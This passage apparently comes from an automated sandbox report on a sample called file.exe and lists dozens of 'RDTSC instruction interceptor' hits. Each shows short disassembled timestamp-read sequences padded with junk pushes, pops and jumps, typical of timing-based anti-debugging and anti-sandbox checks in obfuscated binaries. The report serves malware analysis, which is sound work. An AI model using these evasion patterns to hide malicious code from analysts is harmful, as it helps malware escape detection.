                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A85194 second address: A851AB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB9C8C44103h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A851AB second address: A851B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A85630 second address: A85640 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FB9C8C440FBh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A85640 second address: A85688 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jns 00007FB9C8C44D0Ch 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jns 00007FB9C8C44D0Bh 0x00000015 jc 00007FB9C8C44CF8h 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A85688 second address: A856A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB9C8C440FEh 0x00000007 jne 00007FB9C8C440FCh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A857C5 second address: A857CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A85A71 second address: A85A75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A85A75 second address: A85A7F instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FB9C8C44CF6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A86019 second address: A8602A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FB9C8C440FBh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8602A second address: A86034 instructions: 0x00000000 rdtsc 0x00000002 js 00007FB9C8C44CFCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A886AE second address: A886C8 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FB9C8C44104h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A886C8 second address: A886E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB9C8C44D07h 0x00000009 je 00007FB9C8C44CF6h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A886E9 second address: A886ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A886ED second address: A886F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A883CF second address: A883E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FB9C8C440F6h 0x0000000a jns 00007FB9C8C440F6h 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A883E0 second address: A883F8 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FB9C8C44D02h 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A883F8 second address: A883FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8B6C1 second address: A8B6CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push ecx 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8AF81 second address: A8AF8D instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FB9C8C440F6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8AF8D second address: A8AFB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 jne 00007FB9C8C44CF6h 0x0000000b pop eax 0x0000000c pushad 0x0000000d jng 00007FB9C8C44CF6h 0x00000013 jl 00007FB9C8C44CF6h 0x00000019 jnc 00007FB9C8C44CF6h 0x0000001f popad 0x00000020 pop edx 0x00000021 pop eax 0x00000022 pushad 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8B3F2 second address: A8B401 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jng 00007FB9C8C440FAh 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8B401 second address: A8B406 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8DA90 second address: A8DA94 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8DA94 second address: A8DAAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edi 0x00000008 pop edi 0x00000009 jne 00007FB9C8C44CF6h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 pushad 0x00000013 push edi 0x00000014 pop edi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A90659 second address: A9065D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A94306 second address: A9432E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jmp 00007FB9C8FCBEA6h 0x0000000c pop ecx 0x0000000d push ecx 0x0000000e pushad 0x0000000f ja 00007FB9C8FCBE96h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A94477 second address: A9448E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop eax 0x00000007 jmp 00007FB9C8FCDCAAh 0x0000000c pop esi 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9448E second address: A9449B instructions: 0x00000000 rdtsc 0x00000002 jns 00007FB9C8FCBE96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A94753 second address: A9475D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FB9C8FCDCA6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A99EE4 second address: A99EEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push esi 0x00000006 push eax 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9A1D6 second address: A9A1EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FB9C8FCDCA6h 0x0000000a jp 00007FB9C8FCDCA6h 0x00000010 popad 0x00000011 jc 00007FB9C8FCDCA8h 0x00000017 push eax 0x00000018 pop eax 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9A1EF second address: A9A1F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9A1F4 second address: A9A23D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB9C8FCDCB7h 0x00000009 jnl 00007FB9C8FCDCA6h 0x0000000f jmp 00007FB9C8FCDCB7h 0x00000014 popad 0x00000015 push eax 0x00000016 jc 00007FB9C8FCDCA6h 0x0000001c push ecx 0x0000001d pop ecx 0x0000001e pop eax 0x0000001f pop edx 0x00000020 pop eax 0x00000021 pushad 0x00000022 push ebx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9A38A second address: A9A38E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9A38E second address: A9A392 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9A4F6 second address: A9A500 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FB9C8FCBE96h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9A500 second address: A9A533 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB9C8FCDCAEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jbe 00007FB9C8FCDCC1h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3EF6C second address: A3EF70 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA3A45 second address: AA3A49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA2710 second address: AA2714 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA2714 second address: AA2733 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FB9C8FCDCB3h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA2733 second address: AA2737 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA2737 second address: AA2756 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FB9C8FCDCA6h 0x00000008 jmp 00007FB9C8FCDCABh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f popad 0x00000010 js 00007FB9C8FCDCB0h 0x00000016 push ebx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA2F21 second address: AA2F25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA34E9 second address: AA3517 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB9C8FCDCB6h 0x00000009 jmp 00007FB9C8FCDCB4h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA6A87 second address: AA6A9E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007FB9C8FCBEA2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA6A9E second address: AA6AA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA6AA9 second address: AA6AAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA6DB8 second address: AA6DBE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA6DBE second address: AA6DC8 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FB9C8FCBE96h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA70AE second address: AA70B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA70B2 second address: AA70C6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FB9C8FCBE9Eh 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA763E second address: AA7648 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FB9C8FCDCA6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FDD20 second address: 9FDD26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB3CD1 second address: AB3CEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FB9C8FCDCA6h 0x0000000a popad 0x0000000b jmp 00007FB9C8FCDCAEh 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB3CEE second address: AB3CFA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB4437 second address: AB4458 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB9C8FCDCB6h 0x00000009 ja 00007FB9C8FCDCA6h 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB4458 second address: AB445E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB4AE6 second address: AB4AEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB4AEA second address: AB4AF0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB51EC second address: AB51F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB51F0 second address: AB51F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB51F6 second address: AB5202 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB59E9 second address: AB5A0A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB9C8FCBEA1h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jno 00007FB9C8FCBE96h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB3881 second address: AB3885 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB3885 second address: AB38A0 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FB9C8FCBE96h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FB9C8FCBE9Fh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABB09C second address: ABB0A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABB0A0 second address: ABB0A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABB0A6 second address: ABB0AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABB0AC second address: ABB0B3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABB1E8 second address: ABB1EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC7C71 second address: AC7C83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push ebx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 pop ebx 0x00000009 js 00007FB9C8FCBEA0h 0x0000000f push ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACBD70 second address: ACBD7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 ja 00007FB9C8FCDCA6h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD95BF second address: AD95C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD95C4 second address: AD95E1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB9C8FCDCB7h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD95E1 second address: AD95E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE40ED second address: AE410B instructions: 0x00000000 rdtsc 0x00000002 jo 00007FB9C8FCDCA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FB9C8FCDCB1h 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE410B second address: AE4117 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 popad 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE2D0B second address: AE2D22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 ja 00007FB9C8FCDCA6h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 ja 00007FB9C8FCDCA6h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE2D22 second address: AE2D2B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE2E7A second address: AE2E83 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE32E8 second address: AE3307 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FB9C8FCBE96h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007FB9C8FCBE9Fh 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE3307 second address: AE330D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE789C second address: AE78A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE78A0 second address: AE78A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE78A9 second address: AE78AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE78AF second address: AE78B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE78B4 second address: AE78C5 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FB9C8FCBE9Ch 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEDF92 second address: AEDF96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEDF96 second address: AEDF9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEDF9A second address: AEDFA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEDFA0 second address: AEDFC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jmp 00007FB9C8FCBEA3h 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEDFC1 second address: AEDFC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEDFC6 second address: AEDFCC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEF65B second address: AEF660 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEF660 second address: AEF665 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF7501 second address: AF752C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB9C8FCDCB2h 0x00000009 popad 0x0000000a jl 00007FB9C8FCDCACh 0x00000010 je 00007FB9C8FCDCAEh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B085A5 second address: B085AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B085AB second address: B085AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B085AF second address: B085B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B085B3 second address: B085B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B085B9 second address: B085D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FB9C8FCBE9Dh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B085D0 second address: B085D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1625D second address: B16261 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
